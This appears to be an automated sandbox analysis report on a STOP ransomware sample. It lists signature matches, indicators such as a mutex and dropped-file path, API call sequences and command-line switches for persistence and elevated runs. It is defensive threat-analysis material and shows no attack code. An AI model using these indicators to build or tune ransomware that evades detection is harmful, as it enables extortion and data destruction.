              Source: 00000006.00000000.1853038508.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000004.00000000.1771375510.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000002.00000000.1641361042.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000006.00000002.1865701923.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000006.00000000.1853102324.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000004.00000002.1800921924.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000006.00000002.1865795422.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000000.00000000.1624016801.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000004.00000002.1800981688.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: Process Memory Space: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe PID: 6828, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: Process Memory Space: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe PID: 6956, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: Process Memory Space: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe PID: 5776, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: Process Memory Space: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe PID: 5644, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: Process Memory Space: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe PID: 5104, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, type: DROPPEDMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, type: DROPPEDMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\block.obj
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\nkp.obj
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\usb.obj
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\tcglib.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\guiddef.obj
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\ramapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\diskapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\sdiapi.obj
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\blockapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\uwfapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\locate.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\disk.obj
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\sdiapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\blktable.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\blocksup.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\partapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\uwfapi.obj
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\ramapi.obj
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\debugport.obj
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\debugport.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\fve.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\fvelog.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\fveretailunlock.obj
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\blktable.obj
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\udp.obj
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\seccmd.obj
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\uriapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\fveretailunlock.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\fvelog.obj
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vhdutil.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vmbusapi.obj
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\blockapi.obj
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vdiskapi.obj
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\seccmd.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\fileapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\serialapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\ramdiskvhd.obj
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vhd.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\fve.obj
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\device.obj
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\edriveapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vmbusapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\nbp.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\nkp.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\usb.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\blkcache.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\disk.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\locate.obj
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\block.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\edriveapi.obj
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\fileapi.obj
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\udp.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\device.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\serialapi.obj
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vmbus.obj
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vmbus.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\devlog.obj
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vhd2.obj
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\blocksup.obj
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\partition.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\blkcache.obj
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\uriapi.obj
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\guiddef.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\tcglib.obj
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\ramdiskvhd.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vdiskapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\devlog.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vhdutil.obj
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vhd2.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\partapi.obj
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\udpapi.obj
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\udpapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\partition.obj
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\nbp.obj
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\diskapi.obj
              Source: download.error.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vhd.obj
              Source: classification engineClassification label: mal100.rans.spre.troj.evad.winEXE@9/1138@3/2
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F21900 GetLastError,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,_memset,lstrcpynW,MessageBoxW,LocalFree,LocalFree,LocalFree,0_2_00F21900
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F22440 CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,0_2_00F22440
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F1D240 CoInitialize,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,CoUninitialize,__time64,__localtime64,_wcsftime,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,swprintf,CoUninitialize,CoUninitialize,0_2_00F1D240
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\geo[1].jsonJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeMutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: --Admin0_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: IsAutoStart0_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: IsTask0_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: --ForNetRes0_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: IsAutoStart0_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: IsTask0_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: --Task0_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: --AutoStart0_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: --Service0_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: --Admin0_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: C:\Windows\0_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: D:\Windows\0_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: %username%0_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: F:\0_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: --Admin2_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: IsAutoStart2_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: IsTask2_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: --ForNetRes2_2_00F29F90
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCommand line argument: IsAutoStart2_2_00F29F90
